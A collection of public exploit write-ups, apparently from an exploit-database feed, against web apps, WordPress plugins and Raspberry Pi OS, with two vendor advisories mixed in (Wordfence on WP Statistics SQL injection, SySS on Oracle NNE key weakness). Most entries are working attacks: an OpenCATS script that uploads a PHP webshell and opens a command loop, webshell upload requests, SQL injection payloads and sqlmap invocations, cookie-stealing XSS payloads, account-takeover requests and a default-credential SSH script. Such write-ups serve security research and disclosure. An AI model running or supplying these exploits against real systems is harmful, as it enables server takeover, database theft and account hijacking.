<pre><code># Exploit Title: Home Owners Collection Management System 1.0 - Account Takeover (Unauthenticated)<br /># Date: 9/02/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Linux <br /><br /><br />Home Owners Collection Management System is vulnerable to unauthenticated account takeover.<br />An attacker can takeover any registered 'Staff' user account by just sending below POST request<br />By changing the the "id", "firstname", "lastname" , "username" , "password" ,"type" parameters<br /><br />#Steps to Reproduce<br /><br />1. Send the below POST request by changing "id", "firstname", "lastname" , "username" , "password" ,"type" parameters.<br /><br />2. Go to http://localhost/hocms/admin/ and Log in to the user account by changed username and password<br /><br /><br />==============================================<br /><br />POST /hocms/classes/Users.php?f=save HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------8012296389370411172619882391<br />Content-Length: 899<br />Origin: http://localhost<br />Connection: close<br />Cookie: PHPSESSID=fvle60i4ru4enqa81o3kicskju<br /><br />-----------------------------8012296389370411172619882391<br />Content-Disposition: form-data; name="id"<br /><br /><br />-----------------------------8012296389370411172619882391<br />Content-Disposition: form-data; name="firstname"<br /><br />hi<br />-----------------------------8012296389370411172619882391<br />Content-Disposition: form-data; name="lastname"<br /><br />test<br />-----------------------------8012296389370411172619882391<br />Content-Disposition: form-data; name="username"<br /><br />saud<br />-----------------------------8012296389370411172619882391<br />Content-Disposition: form-data; name="password"<br /><br />saud<br />-----------------------------8012296389370411172619882391<br />Content-Disposition: form-data; name="type"<br /><br />1<br />-----------------------------8012296389370411172619882391<br />Content-Disposition: form-data; name="img"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------8012296389370411172619882391--<br /><br /></code></pre>
<pre><code># Exploit Title: Raspberry Pi 5.10 - Default Credentials<br /># Date: 08/12/2021<br /># Exploit Author: netspooky<br /># Vendor Homepage: https://www.raspberrypi.com/<br /># Software Link: https://www.raspberrypi.com/software/operating-systems/<br /># Version: Raspberry Pi OS <= 5.10<br /># Tested on: Raspberry Pi OS 5.10<br /># CVE : CVE-2021-38759<br /><br /># Initial Release: https://twitter.com/netspooky/status/1468603668266209280<br /><br /># Run: $ python3 exploit.py IP<br /><br />import paramiko<br /><br />import sys<br /><br />h=sys.argv[1]<br /><br />u="pi"<br /><br />p="raspberry"<br /><br />c=paramiko.client.SSHClient()<br /><br />c.set_missing_host_key_policy(paramiko.AutoAddPolicy())<br /><br />c.connect(h,username=u,password=p)<br /><br />i,o,e=c.exec_command("id")<br /><br />print(o.read())<br /><br />c.close()<br /> <br /></code></pre>
<pre><code># Exploit Title: Home Owners Collection Management System 1.0 - 'id' Blind SQL Injection<br /># Date: 9/02/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.sourcecodester.com/<br /># Software Link: https://www.sourcecodester.com/php/15162/home-owners-collection-management-system-phpoop-free-source-code.html<br /># Version: 1.0<br /># Tested on: XAMPP, Windows 10<br /><br /><br /># Vulnerable Code<br /><br />line 68 in file "/hocms/admin/members/view_member.php"<br /><br />$collection = $conn->query("SELECT * FROM `collection_list` where member_id = '{$id}' order by date(date_collected) desc");<br /><br /><br /># Sqlmap command:<br /><br />sqlmap -u 'http://localhost/hocms/admin/?id=0&page=members/view_member' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch<br /><br /># Output:<br /><br />Parameter: id (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: id=0' AND (SELECT 9980 FROM (SELECT(SLEEP(5)))POvo)-- OyKE&page=members/view_member<br /></code></pre>
<pre><code># Exploit Title: OpenCATS 0.9.4 - Remote Code Execution (RCE)<br /># Google Dork: intext:"Current Available Openings, Recently Posted Jobs"<br /># Date: 21/09/2021<br /># Exploit Author: Nicholas Ferreira - https://github.com/Nickguitar<br /># Vendor Homepage: https://www.opencats.org/<br /># Software Link: https://github.com/opencats/OpenCATS<br /># Version: <=0.9.4 Countach<br /># Tested on: Debian, CentOS, Windows Server<br /><br />#!/bin/bash<br /><br />if [ $# -eq 0 ]<br />then<br /> echo "Usage: $0 <target URL>"<br /> exit<br />fi<br /><br /><br /><br /># if a payload doesn't work, try another<br /><br />payload='GIF87a<?php echo system($_REQUEST[0]); ?>'<br />#payload='GIF87a<?php echo exec($_REQUEST[0]); ?>'<br />#payload='GIF87a<?php echo shell_exec($_REQUEST[0]); ?>'<br />#payload='GIF87a<?php echo passthru($_REQUEST[0]); ?>'<br />#payload='GIF87a<?php echo `$_REQUEST[0]`; ?>'<br />#payload='GIF87a<?php echo system($_REQUEST[0]); ?>'<br />#payload='GIF87a<?php echo $p=popen($_REQUEST[0],"r");while(!feof($p))echo fread($p,1024); ?>'<br /><br />target=$1<br /><br />green="\033[0;32m"<br />red="\033[0;31m"<br />reset="\033[0m"<br /><br />#====================== Functions<br /><br />rev() {<br />while true<br /> do echo -n -e "\n$ "<br /> read cmd<br /> curl -skL -X POST -d "0=$cmd" $1 | sed "s/^GIF87a//" | sed "$ d"<br /> done<br />}<br /><br />upload() {<br /> curl -skL $1/$2 \<br /> -H "Connection: close" \<br /> -F resumeFile=@"$3;type=application/x-php" \<br /> -F ID="$firstJb" \<br /> -F candidateID="-1" \<br /> -F applyToJobSubAction="resumeLoad" \<br /> --compressed \<br /> --insecure<br />}<br /><br />getVersion() {<br /> ver=`curl -skL $1 | grep -E "span.*([0-9]\.)+" | sed "s/<[^>]*>//g" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`<br /><br /> if [ -z "${ver}" ]<br /> then<br /> ver=`curl -skL "$1/installtest.php" | grep -Eio "CATS version is ([0-9]\.)+[0-9]*" | grep -Eo -m 1 "([0-9]\.)+[0-9]*"`<br /> if [ -z "${ver}" ]<br /> then<br /> echo -e "${red}[-] Couldn't identity CATS version, but that's ok...${reset}"<br /> return 0<br /> fi<br /> fi<br /> echo -e "${green}[*] Version detected: $ver${reset}"<br />}<br /><br />writePayload(){<br /><br /> tmpfile=$(tr -dc A-Za-z0-9 </dev/urandom | head -c 5)".php"<br /> file=`basename $tmpfile`<br /> echo "$1" > $tmpfile<br />}<br /><br />banner(){<br /> echo "IF8uXyAgICAgXywtJyIiYC0uXyAKKCwtLmAuXywnKCAgICAgICB8XGAtL3wgICAgICAgIFJldkNBVCAtIE9wZW5DQVQgUkNFCiAgICBgLS4tJyBcICktYCggLCBvIG8pICAgICAgICAgTmljaG9sYXMgIEZlcnJlaXJhCiAgICAgICAgICBgLSAgICBcYF9gIictICAgaHR0cHM6Ly9naXRodWIuY29tL05pY2tndWl0YXI=" | base64 -d<br /> echo -e "\n"<br />}<br /><br />#======================<br /><br />banner<br /><br />echo "[*] Attacking target $target"<br /><br />echo "[*] Checking CATS version..."<br />getVersion $target<br />#exit<br /><br />echo "[*] Creating temp file with payload..."<br />writePayload "$payload"<br /><br />#exit<br /><br />echo "[*] Checking active jobs..."<br /><br />jbRequest=`curl -skL $target'/careers/index.php?m=careers&p=showAll'`<br />numJb=`echo "$jbRequest" | grep "Posted Jobs" |sed -E 's/.*: ([0-9]+).*/\1/'`<br />firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`<br /><br />if [[ ! $numJb -gt 0 ]]<br />then<br /> echo -e "${red}[-] No active jobs found.${reset}"<br /> echo "[*] Trying another path..."<br /> jbRequest=`curl -skL $target'/index.php?m=careers&p=showAll'`<br /> numJb=`echo "$jbRequest" | grep "Posted Jobs" | sed -e 's/<[^>]*>//g' | sed -E 's/.*Posted Jobs.*: ([0-9]+).*/\1/'`<br /><br /> if [[ ! $numJb -gt 0 ]]<br /> then<br /> echo -e "${red}[-] Couldn't find any active job.${reset}"<br /> exit<br /> fi<br />fi<br /><br />firstJb=`echo "$jbRequest" | grep -m 1 '<td><a href="index.php?m=careers' | sed -E 's/.*=([0-9]+)\".*/\1/'`<br /><br />echo -e "${green}[+] Jobs found! Using job id $firstJb${reset}"<br />echo "[*] Sending payload..."<br /><br />req=`upload "$target" "/careers/index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`<br /><br />if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`<br />then<br /> echo -e "${red}[-] Couldn't detect if payload was uploaded${reset}"<br /> echo "[*] Checking by another method..."<br /><br /> sed -i "s/GIF87a//" $tmpfile<br /><br /> req=`upload "$target" "index.php?m=careers&p=onApplyToJobOrder" "$tmpfile"`<br /><br /> if ! `echo "$req" | egrep -q "still be uploaded|will be uploaded|$file"`<br /> then<br /> echo -e "${red}[-] Couldn't upload payload...${reset}"<br /> exit<br /> fi<br />fi<br /><br />echo -e "${green}[+] Payload $file uploaded!"<br />echo "[*] Deleting created temp file..."<br />rm $tmpfile<br />echo "[*] Checking shell..."<br />check=$(curl -skL -d '0=echo 0x7359' "$target/upload/careerportaladd/$file")<br />if `echo $check | grep -q "0x7359"`<br />then<br /> echo -e "${green}[+] Got shell! :D${reset}"<br /> curl -skL -X POST -d "0=id;uname -a" "$target/upload/careerportaladd/$file" | sed "s/^GIF87a//" | sed "$ d"<br /> rev $target/upload/careerportaladd/$file<br />else<br /> echo -e "${red}[-] Couldn't get reverse shell.\n Maybe you should try it manually or use another payload.${reset}"<br />fi<br /><br /></code></pre>
<pre><code>On February 7, 2022, Security Researcher Cyku Hong from DEVCORE reported a vulnerability to us that they discovered in WP Statistics, a WordPress plugin installed on over 600,000 sites. This vulnerability made it possible for unauthenticated attackers to execute arbitrary SQL queries by appending them to an existing SQL query. This could be used to extract sensitive information like password hashes and secret keys from the database. On request, we assigned them the vulnerability identifier: CVE-2022-0513.<br /><br />Even though Wordfence provides protection against this vulnerability, we strongly recommend ensuring that your site has been updated to the latest patched version of “WP Statistics,” which is version 13.1.5 at the time of this publication.<br /><br /><br />Description: Unauthenticated Blind SQL Injection<br /><br />Affected Plugin: WP Statistics<br /><br />Plugin Slug: wp-statistics<br /><br />Plugin Developer: VeronaLabs<br /><br />Affected Versions: <= 13.1.4<br /><br />CVE ID: CVE-2022-0513<br /><br />CVSS Score: 9.8 (Critical)<br /><br />CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H<br /><br />Researcher/s: Cyku Hong from DEVCORE<br /><br />Fully Patched Version: 13.1.5<br /><br />WP Statistics is a WordPress plugin designed to provide a centralized hub for all of a WordPress site’s statistics, such as visitor data, and it emphasizes storing this data locally to the WordPress site to preserve user privacy. As such, it is reasonable to expect that the plugin would implement a lot of functionality to store and retrieve information from the database through the use of SQL queries. Unfortunately, the implementation of one of these queries was insecure, creating a SQL Injection vulnerability.<br /><br />When the “Record Exclusions'' feature was enabled, this vulnerability became exploitable. The “Record Exclusions” feature is designed to record when a visit, or a “hit”, is excluded from the site’s statistics, such as visits by users with specific roles, login page access, and anything else that a site owner may have explicitly selected to exclude. It records that data to a separate database table so as not to contaminate the main statistical data the plugin collects.<br /><br />In order to record these hits when a caching plugin was enabled, the plugin registered a REST route /wp-json/wp-statistics/v2/hit that would call the hit_callback() function. This function would then call the record() function from the ‘Hits’ class which checks to see if the request should be excluded and determines what exclusion the request correlates to, prior to calling the next appropriate record() function.<br /><br />public static function record()<br /><br />{<br /><br /># Check Exclusion This Hits<br /><br />$exclusion = Exclusion::check();<br /><br /># Record Hits Exclusion<br /><br />if ($exclusion['exclusion_match'] === true) {<br /><br />Exclusion::record($exclusion);<br /><br />}<br /><br /># Record User Visits<br /><br />if (Visit::active() and $exclusion['exclusion_match'] === false) {<br /><br />Visit::record();<br /><br />}<br /><br /># Record Visitor Detail<br /><br />if (Visitor::active()) {<br /><br />$visitor_id = Visitor::record($exclusion);<br /><br />}<br /><br />When the exclusion_match parameter is set to true in a request, the data is then passed to the record() function from the ‘Exclusion’ class where the plugin attempts to update the count of an exclusion reason for the day if it is present in the database. If the exclusion reason isn’t present in the database for the current date the initial query will return false and trigger the next query to add a new record count to the table for the reason.<br /><br />public static function record($exclusion = array())<br /><br />{<br /><br />global $wpdb;<br /><br />// If we're not storing exclusions, just return.<br /><br />if (self::record_active() != true) {<br /><br />return;<br /><br />}<br /><br />// Check Exist this Exclusion in this day<br /><br />$result = $wpdb->query("UPDATE " . DB::table('exclusions') . " SET `count` = `count` + 1 WHERE `date` = '" . TimeZone::getCurrentDate('Y-m-d') . "' AND `reason` = '{$exclusion['exclusion_reason']}'");<br /><br />if (!$result) {<br /><br />$insert = $wpdb->insert(<br /><br />DB::table('exclusions'),<br /><br />array(<br /><br />'date' => TimeZone::getCurrentDate('Y-m-d'),<br /><br />'reason' => $exclusion['exclusion_reason'],<br /><br />'count' => 1,<br /><br />)<br /><br />);<br /><br />if (!$insert) {<br /><br />if (!empty($wpdb->last_error)) {<br /><br />\WP_Statistics::log($wpdb->last_error);<br /><br />}<br /><br />}<br /><br />The $wpdb->query() function was used for the initial UPDATE query and used the user-supplied 'exclusion_reason' value as part of the query. Due to the fact that there was no escaping on the user supplied value, or parameterization on the query, attackers could easily append additional SQL queries to the existing query via the 'exclusion_reason' and extract sensitive information from the database.<br /><br />Since no data from the SQL query was returned in the response, and the response did not indicate a boolean answer, an attacker would need to use a Time-Based blind approach to extract information from the database. This means that they would need to use SQL CASE statements along with the SLEEP() command while observing the response time of each request to steal information from the database. This is an intricate, yet frequently successful method to obtain information from a database when exploiting SQL Injection vulnerabilities.<br /><br />Upon further analysis, we uncovered that a user could also simply pass the exclusion_match parameter equal to yes, the exclusion_reason parameter set to the SQLi payload, and the wp_statistics_hit_rest parameter set to true, along with passing the string wp-json/ in the request URI to trigger the same record() function from the ‘Exclusions’ class. This method did not require a caching plugin to be enabled to obtain a valid nonce to trigger the REST endpoint. This is due to the is_rest_request() function returning true when the $_SERVER['REQUEST_URI'] contains the REST prefix, wp-json/, even if the request isn’t a genuine REST request. This ultimately triggers the entire record process.<br /><br />Conclusion<br /><br />In today’s post, we detailed a flaw in the “WP Statistics” plugin that made it possible for unauthenticated attackers to inject arbitrary SQL queries to steal sensitive information from a database. This flaw has been fully patched in version 13.1.5.<br /><br />We recommend that WordPress site owners immediately verify that their site has been updated to the latest patched version available, which is version 13.1.5 at the time of this publication.<br /><br />All Wordfence users, including Free are protected from exploits targeting this vulnerability thanks to the Wordfence Firewall’s built-in SQL Injection protection.<br /><br />If you know a friend or colleague who is using this plugin on their site, we highly recommend forwarding this advisory to them to help keep their sites protected as this is a serious vulnerability that can lead to complete site takeover.<br /><br />Congratulations to Cyku Hong from DEVCORE for discovering and responsibly disclosing this vulnerability to the plugin’s developers. <br /></code></pre>
<pre><code># Exploit Title: Free School Management Software 1.0 - 'multiple' Stored Cross-Site Scripting (XSS)<br /># Exploit Author: fuzzyap1<br /># Date: 7-12-2021<br /># Category: Web application<br /># Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip<br /># Version: 1.0<br /># Tested on: windows<br /># Vulnerable page: http://localhost/admin/enquiry_category<br /># Vulnerable Parameters: "category"<br /><br />Technical description:<br />A stored XSS vulnerability exists in the Event management software. An<br />attacker can leverage this vulnerability in order to run javascript on the<br />web server surfers behalf, which can lead to cookie stealing, defacement<br />and more.<br /><br />Steps to exploit:<br />1) Navigate to http://localhost/admin/enquiry_category<br />2) Insert your payload in the "category" parameter<br />3) Click "save"<br /><br />Proof of concept (Poc):<br />The following payload will allow you to run the javascript -<br />"><img src=# onerror=alert(document.cookie)><br /><br />---<br /><br />POST http://localhost/admin/enquiry_category/update/3 HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)<br />Gecko/20100101 Firefox/89.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data;<br />boundary=---------------------------151631281127875309002088019539<br />Content-Length: 490<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/admin/enquiry_category<br />Cookie: CMSSESSID2cb149290396=0bd8mo7gisd21t9pl1ioorhl63;<br />ci_session=6vl4s7keu1ucpoomv9tj4oe8an7kspa0<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------151631281127875309002088019539<br />Content-Disposition: form-data; name="category"<br /><br />This is for ID 3 informa222tion"><img src=# onerror=alert(document.cookie)><br />-----------------------------151631281127875309002088019539<br />Content-Disposition: form-data; name="purpose"<br /><br />Payment<br />-----------------------------151631281127875309002088019539<br />Content-Disposition: form-data; name="whom"<br /><br />Tutorial<br />-----------------------------151631281127875309002088019539--<br /><br />---<br /><br />Steps to exploit:<br />1) Navigate to http://localhost/admin/manage_profile<br />2) Insert your payload in the "anme" parameter<br />3) Click "save"<br /><br />Proof of concept (Poc):<br />The following payload will allow you to run the javascript -<br />"><img src=# onerror=alert('xss')><br /><br />---<br /><br />POST /admin/manage_profile/update HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)<br />Gecko/20100101 Firefox/89.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data;<br />boundary=---------------------------13285163425854907563979323722<br />Content-Length: 519<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/admin/manage_profile<br />Cookie: ci_session=hiibl4e0oidvqier9b8hhfb5c1rl6l16<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------13285163425854907563979323722<br />Content-Disposition: form-data; name="name"<br /><br />Administrator"><img src=# onerror=alert(document.cookie)><br />-----------------------------13285163425854907563979323722<br />Content-Disposition: form-data; name="email"<br /><br />admin@admin.com<br />-----------------------------13285163425854907563979323722<br />Content-Disposition: form-data; name="userfile"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------13285163425854907563979323722--<br /><br />---<br /></code></pre>
<pre><code>## Title: Hospital Management Startup v1.0 remote SQL-Injections<br />## Author: nu11secur1ty<br />## Date: 02.10.2022<br />## Vendor: https://github.com/kabirkhyrul<br />## Software: https://github.com/kabirkhyrul/HMS<br />## CVE-2022-23366<br /><br />## Description:<br />The loginid and password parameters from Hospital Management Startup<br />1.0 appear to be vulnerable to SQL injection attacks.<br />The attacker can retrieve all information from the administrator<br />account of the system and he can use the information for malicious<br />purposes!<br />WARNING: If this is in some external domain, or some subdomain, or<br />internal, this will be extremely dangerous!<br /><br />Status: CRITICAL<br /><br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: loginid (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: loginid=hackedpassword=hacked' or '6681'='6681' AND<br />(SELECT 1959 FROM (SELECT(SLEEP(3)))PuyC) AND<br />'sDHP'='sDHP&rememberme=on&submit=Login<br />---<br /><br />```<br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-mitre/edit/main/2022/CVE-2022-23366)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/hri9eo)<br /><br /><br /></code></pre>
<pre><code># Exploit Title: Free School Management Software 1.0 - Remote Code Execution (RCE)<br /># Exploit Author: fuuzap1<br /># Date: 7-12-2021<br /># Category: Web application<br /># Vendor Homepage: https://www.sourcecodester.com/php/15073/free-school-management-software.html<br /># Software Link: https://www.sourcecodester.com/sites/default/files/download/jovahsource/free_and_open_source.zip<br /># Version: 1.0<br /># Tested on: windows<br /># Vulnerable page: http://localhost/admin/examQuestion<br /><br /><br />Technical description:<br />A unrestricted file upload vulnerability exists in the Free school<br />management software v1.0. An attacker can leverage this vulnerability in<br />order to get a remote code execution on the affected web server. Once a php<br />webshell containing "<?php system($_GET["cmd"]); ?>" gets uploaded it is<br />getting save into /uploads/exam_question/ directory, and is accessible by<br />all users. the attacker can gain remote code execution on the web server.<br /><br />Steps to exploit:<br />1) Navigate to http://localhost/admin/manage_profile<br />2) click "ADD NEW QUESTION PAPER" edit base infomation<br />3) uploading a php webshell containing "<?php system($_GET["cmd"]); ?>" in<br />the Field "upload Drag and drop a file here or click"<br />3) Click "save"<br />4) open http://localhost/uploads/exam_question/cmd.php?cmd=phpinfo() then<br />php code execution<br />Proof of concept (Poc):<br />The following payload will allow you to run the javascript -<br /><?php system($_GET["cmd"]); ?><br /><br />---<br />POST /admin/examQuestion/create HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0)<br />Gecko/20100101 Firefox/89.0<br />Accept:<br />text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data;<br />boundary=---------------------------183813756938980137172117669544<br />Content-Length: 1331<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/admin/examQuestion<br />Cookie: ci_session=793aq6og2h9mf5cl2q2b3p4ogpcslh2q<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="name"<br /><br />test4<br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="class_id"<br /><br />2<br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="subject_id"<br /><br />5<br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="timestamp"<br /><br />2021-12-08<br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="teacher_id"<br /><br />1<br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="file_type"<br /><br />txt<br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="status"<br /><br />1<br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="description"<br /><br />123123<br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="_wysihtml5_mode"<br /><br />1<br />-----------------------------183813756938980137172117669544<br />Content-Disposition: form-data; name="file_name"; filename="cmd.php"<br />Content-Type: application/octet-stream<br /><br /><?php eval($_GET["cmd"]); ?><br />-----------------------------183813756938980137172117669544--<br />---<br /></code></pre>
<pre><code># Exploit Title: WordPress Plugin Secure Copy Content Protection and Content Locking 2.8.1 - SQL-Injection (Unauthenticated)<br /># Date 08.02.2022<br /># Exploit Author: Ron Jost (Hacker5preme)<br /># Vendor Homepage: https://ays-pro.com/<br /># Software Link: https://downloads.wordpress.org/plugin/secure-copy-content-protection.2.8.1.zip<br /># Version: < 2.8.2<br /># Tested on: Ubuntu 20.04<br /># CVE: CVE-2021-24931<br /># CWE: CWE-89<br /># Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24931/README.md<br /><br />'''<br />Description:<br />The Secure Copy Content Protection and Content Locking WordPress plugin before 2.8.2 does not escape the<br />sccp_id parameter of the ays_sccp_results_export_file AJAX action (available to both unauthenticated<br />and authenticated users) before using it in a SQL statement, leading to an SQL injection.<br />'''<br /><br />banner = '''<br /><br /> .--. .-..-. .--. .---. .--. .---. ,-. .---. .-. .--. .----. ,-.<br />: .--': :: :: .--' `--. :: ,. :`--. :.' : `--. : .'.': .; :`-- ;.' :<br />: : : :: :: `; _____ ,',': :: : ,',' `: : _____ ,','.'.'_`._, : .' ' `: :<br />: :__ : `' ;: :__:_____:.'.'_ : :; :.'.'_ : ::_____:.'.'_ :_ ` : : : _`,`. : :<br />`.__.' `.,' `.__.' :____;`.__.':____; :_; :____; :_: :_:`.__.' :_;<br /> <br /> [+] Copy Content Protection and Content Locking - SQL Injection<br /> [@] Developed by Ron Jost (Hacker5preme)<br /> <br />'''<br />print(banner)<br />import argparse<br />from datetime import datetime<br />import os<br /><br /># User-Input:<br />my_parser = argparse.ArgumentParser(description= 'Copy Content Protection and Content Locking SQL-Injection (unauthenticated)')<br />my_parser.add_argument('-T', '--IP', type=str)<br />my_parser.add_argument('-P', '--PORT', type=str)<br />my_parser.add_argument('-U', '--PATH', type=str)<br />args = my_parser.parse_args()<br />target_ip = args.IP<br />target_port = args.PORT<br />wp_path = args.PATH<br /><br /># Exploit:<br />print('[*] Starting Exploit at: ' + str(datetime.now().strftime('%H:%M:%S')))<br />print('[*] Payload for SQL-Injection:')<br />exploitcode_url = r'sqlmap "http://' + target_ip + ':' + target_port + wp_path + r'wp-admin/admin-ajax.php?action=ays_sccp_results_export_file&sccp_id[]=3)*&type=json" '<br />print(' Sqlmap options:')<br />print(' -a, --all Retrieve everything')<br />print(' -b, --banner Retrieve DBMS banner')<br />print(' --current-user Retrieve DBMS current user')<br />print(' --current-db Retrieve DBMS current database')<br />print(' --passwords Enumerate DBMS users password hashes')<br />print(' --tables Enumerate DBMS database tables')<br />print(' --columns Enumerate DBMS database table column')<br />print(' --schema Enumerate DBMS schema')<br />print(' --dump Dump DBMS database table entries')<br />print(' --dump-all Dump all DBMS databases tables entries')<br />retrieve_mode = input('Which sqlmap option should be used to retrieve your information? ')<br />exploitcode = exploitcode_url + retrieve_mode + ' --answers="follow=Y" --batch -v 0'<br />os.system(exploitcode)<br />print('Exploit finished at: ' + str(datetime.now().strftime('%H:%M:%S')))<br /> <br /><br /></code></pre>
<pre><code>Advisory ID: SYSS-2021-062<br />Product: Database<br />Manufacturer: Oracle<br />Affected Version(s): 12.1.0.2, 12.2.0.1, 19c<br />Tested Version(s): 18c<br />Vulnerability Type: Inadequate Encryption Strength (CWE-326)<br />Risk Level: Medium<br />Solution Status: Fixed<br />Manufacturer Notification: 2021-03-17<br />Solution Date: 2021-08-07<br />Public Disclosure: 2021-12-10<br />CVE Reference: CVE-2021-2351<br />Author of Advisory: Moritz Bechler, SySS GmbH<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Overview:<br /><br />Oracle Database is a general purpose relational database management<br />system (RDMBS).<br /><br />The manufacturer describes the product as follows (see [1]):<br /><br />"Oracle database products offer customers cost-optimized and high-performance <br />versions of Oracle Database, the world's leading converged, multi-model <br />database management system, as well as in-memory, NoSQL and MySQL databases.<br />Oracle Autonomous Database, available on premises via Oracle Cloud@Customer <br />or in the Oracle Cloud Infrastructure, enables customers to simplify relational <br />database environments and reduce management workloads."<br /><br />To protect the client/server communication, a proprietary security protocol <br />"Native Network Encryption" (NNE) is used. <br />A TLS-based alternative can optionally be configured.<br /><br />NNE's integrity protection mechanism deliberately weakens the key used <br />for computing per-packet message authentication codes (MACs). <br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Vulnerability Details:<br /><br />When analyzing the protocol details, SySS found out that depending on<br />the selected hash algorithms, one of two key generation schemes is used.<br />Both are seeded with material from the established session key.<br />However, even for the AES-based key generator, which is used when modern <br />cryptographic primitives are selected, the session key is truncated to<br />40 bits.<br /><br />For more details on the protocol and MAC computation, refer to our<br />paper [4].<br /><br />Brute-force cracking of that key, for example if only integrity but no <br />encryption is enabled, is likely possible and allows malicious<br />manipulation of transmitted database commands or data.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Proof of Concept (PoC):<br /><br />The initialization of the key generator, as originally implemented, can <br />be described with the following Python code, where SK is the established<br />session key, and the initialization vector (IV) was exchanged in<br />clear text during NNE negotiation. <br /><br />mk = SK[0:5] + b'\xFF' + b'\x00' * 10<br />self.m = AES.new(mk, AES.MODE_CBC, iv=IV[0:16])<br />self.ms = b'\x00'*32<br />self.ms = s = self.m.encrypt(self.ms)<br />self.m = AES.new(s[0:16], AES.MODE_CBC, iv=s[16:32])<br /><br />k1 = s[0:5] + b'\xB4' + s[6:16]<br />self.s2c = AES.new(k1, AES.MODE_CBC, iv=s[16:32])<br />self.s2cs = b'\x00' * 32<br /><br />k2 = s[0:5] + b'\x5A' + s[6:16]<br />self.c2s = AES.new(k2, AES.MODE_CBC, iv=s[16:32])<br />self.c2ss = b'\x00' * 32<br /><br /><br />A per-packet key "k" is then generated like<br /><br />self.c2ss = k = self.c2s.encrypt(self.c2ss)<br /><br />and appended to the packet data as well as hashed using the selected hash algorithm.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Solution:<br /><br />Update the Oracle Database servers and clients to the patched versions.<br />Enforce usage of a secured protocol version by setting the following options:<br /><br /> SQLNET.ALLOW_WEAK_CRYPTO_CLIENTS=FALSE (server-side)<br /> SQLNET.ALLOW_WEAK_CRYPTO=FALSE (client-side)<br /><br /><br />Or use TLS-based transport security instead of Native Network Encryption.<br /><br /><br />More information:<br />https://www.oracle.com/security-alerts/cpujul2021.html<br />https://support.oracle.com/rs?type=doc&id=2791571.1 (customer account required)<br /><br 